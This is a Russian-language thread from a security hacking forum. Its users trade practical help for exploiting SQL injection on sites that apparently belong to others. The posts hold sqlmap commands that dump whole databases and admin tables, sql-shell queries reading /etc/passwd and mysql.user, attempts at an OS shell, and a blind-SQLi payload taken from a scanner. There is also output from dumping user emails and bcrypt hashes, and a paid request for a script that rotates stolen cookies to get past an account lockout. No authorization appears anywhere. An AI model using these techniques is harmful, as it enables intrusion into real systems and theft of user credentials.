ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

01.05.2020, 17:23
|
|
Guest
Сообщений: n/a
Провел на форуме: 12479
Репутация:
2
|
|
столкнулся с ситуацией что приложение лочит аккаунт после 10 ошибок 500, скуля слепая и иначе данные никак не получить. поскольку лочится сам аккаунт то думаю что можно юзать куки от нескольких пользователей. на ум приходит только заменять куки при каждом запросе на новые и далее по кругу при каждом запросе (брать их из текстового файла) с определенным таймингом и подключить этот скрипт в качестве темпера. Подскажите это осуществимо? Мог бы кто нибудь помочь с реализацией за вознаграждение?)
|
|
|
|

05.05.2020, 06:46
|
|
Guest
Сообщений: n/a
Провел на форуме: 1085
Репутация:
0
|
|
Сообщение от karkajoi
karkajoi said:
↑
Точно так же как написали выше, со слепыми может быть ложное срабатывание
если акунетикс пишет SQL injection а не блинд, значит ложные исключены?
Как часто акунетикс выдает ложные скули?
|
|
|
|

05.05.2020, 06:50
|
|
Guest
Сообщений: n/a
Провел на форуме: 96779
Репутация:
5
|
|
Сообщение от rozzet
rozzet said:
↑
если акунетикс пишет SQL injection а не блинд, значит ложные исключены?
Как часто акунетикс выдает ложные скули?
Ну если он пишет что union query или error based, то да, если time based то может и ложное, где то процентов 15
|
|
|
|

10.05.2020, 14:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 108975
Репутация:
24
|
|
Буду рад помощи, сливаю базу ниже указанным способом:
Код:
Code:
sqlmap -r my_http --dump --threads=5 --dbms=mysql --dump -D some_db --risk=3
Скорость просто ужас(пробовал менять потоки, тайминги итд.. результата ноль) Как следствие Пробую слить данные только админов, указываю таблицу и запускаю:
Код:
Code:
sqlmap -r my_http --dump --threads=5 --dbms=mysql --dump -D some_db -T admin_table --risk=3
[12:15:44] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[12:15:56] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[12:15:57] [INFO] adjusting time delay to 1 second due to good response times
[12:15:58] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[12:15:58] [ERROR] unable to retrieve the number of columns for table 'admin_table' in database 'some_db'
[12:15:58] [WARNING] unable to retrieve column names for table 'admin_table' in database 'some_db'
[12:18:10] [WARNING] unable to enumerate the columns for table 'admin_table' in database 'some_db'
[12:18:10] [INFO] fetched data logged to text files under '/root/.sqlmap/....'
Получаю облом.... Пробую --sql-shell:
Код:
Code:
sql-shell> SELECT LOAD_FILE('/etc/passwd');
[INFO] fetching SQL SELECT statement query output: 'SELECT LOAD_FILE('/etc/passwd')'
[INFO] retrieved:
sql-shell> desc mysql.user
[INFO] fetching SQL query output: 'desc mysql.user'
[INFO] retrieved:
sql-shell> SELECT * FROM mysql.user;
[INFO] fetching SQL SELECT statement query output: 'SELECT * FROM mysql.user'
[INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[INFO] fetching columns for table 'user' in database 'mysql'
[INFO] retrieved:
[ERROR] unable to retrieve the number of columns for table 'user' in database 'mysql'
[INFO] retrieved:
[WARNING] the SQL query provided does not return any output
Снова облом а именно... в первых двух случаях получаю просто пустые строки, в третьем случае просто ошибка, пробую заюзать --os-shell:
Код:
Code:
[WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default, /srv/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
Если лить в первый path-и(1) то получаю постоянно 404 (Not Found)
пробовал сразу сбрутить(4) по предоставленному sqlmap-ом словарю... но все без результата.
Главный вопрос: как так я могу получить дамп всей базы но не имею возможность указать конкретную таблицу?
Пробовал имя таблицы указывать в ' ' подскажите что я упускаю...
Решение:
Напишу вдруг кому то поможет В моем случае проблема была в том что при запуске я 'соглашался' на редирект, после отказа от редиректа данные начали извлекаться нормально.
|
|
|
|

24.05.2020, 11:06
|
|
Guest
Сообщений: n/a
Провел на форуме: 6200
Репутация:
0
|
|
Нужна помощь
Сканер выдал такое:
Код:
Code:
This vulnerability affects /part_eYXfQU0lw9rhwob9qRP2GVMv.html.
Discovered by: Scripting (Blind_Sql_Injection.script).
Attack details
URL encoded POST input partid was set to -1' OR 3*2*1=6 AND 000323=000323 or 'XAZghp6T'='
Tests performed:
-1' OR 2+323-323-1=0+0+0+1 or 'XAZghp6T'=' => TRUE
-1' OR 3+323-323-1=0+0+0+1 or 'XAZghp6T'=' => FALSE
-1' OR 3*2 FALSE
-1' OR 3*2>(0+5+323-323) or 'XAZghp6T'=' => FALSE
-1' OR 2+1-1-1=1 AND 000323=000323 or 'XAZghp6T'=' => TRUE
-1' OR 000323=000323 AND 3+1-1-1=1 or 'XAZghp6T'=' => FALSE
-1' OR 3*2=5 AND 000323=000323 or 'XAZghp6T'=' => FALSE
-1' OR 3*2=6 AND 000323=000323 or 'XAZghp6T'=' => TRUE
-1' OR 3*2*0=6 AND 000323=000323 or 'XAZghp6T'=' => FALSE
-1' OR 3*2*1=6 AND 000323=000323 or 'XAZghp6T'=' => TRUE
Как правильно скормить в sqlmap?
|
|
|
|

25.05.2020, 23:11
|
|
Новичок
Регистрация: 07.07.2009
Сообщений: 2
Провел на форуме: 16896
Репутация:
0
|
|
как можно скормить sqlmap уязвимость в хедере?
|
|
|

25.05.2020, 23:48
|
|
Guest
Сообщений: n/a
Провел на форуме: 169390
Репутация:
47
|
|
Сообщение от FireRidlle
FireRidlle said:
↑
как можно скормить sqlmap уязвимость в хедере?
Вы можете полностью скопировать запрос в текстовый файл и в уязвимом параметре поставить знак * и потом уже стартовать скульмап:
Код:
Code:
sqlmap -r "zapros.txt"
или же скопировать запрос и при старте указать тестируемый параметр/хедер (например User-Agent):
Код:
Code:
sqlmap -r "zapros.txt" -p "user-agent"
|
|
|
|

28.05.2020, 18:02
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме: 23906
Репутация:
-5
|
|
|
|
|

28.05.2020, 19:29
|
|
Guest
Сообщений: n/a
Провел на форуме: 96779
Репутация:
5
|
|
|
|
|
|

31.05.2020, 05:46
|
|
Guest
Сообщений: n/a
Провел на форуме: 6200
Репутация:
0
|
|
Приветствую! Проблема такая: при сливе обрезается хеш:
Код:
Code:
[04:41:49] [INFO] retrieved: 'test@mail.com','$2y$10$IN1YM1wQoCAAI...
[04:41:51] [INFO] retrieved: 'test@mail.com','$2y$10$s7Y6jmxm0Lk5MYk6p727...
[04:41:53] [INFO] retrieved: 'test@mail.net','$2y$10$zIlubVWzn/zVAbNef...
[04:41:54] [INFO] retrieved: 'test@mail.com','$H\\2y$7KguiftaH$10\\ZByke...
[04:41:56] [INFO] retrieved: 'test@mail.com','$2y$10$8ycUx4ZRAtEvOpHS...
[04:41:58] [INFO] retrieved: 'test@mail.com','$2y$10$X2cd3HkmJs5f3DsUtzk...
[04:42:00] [INFO] retrieved: 'test@mail.com','$2y$10$52HMKZS6r4HT...
Как это побороть? Пробовал hex, no-cast
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|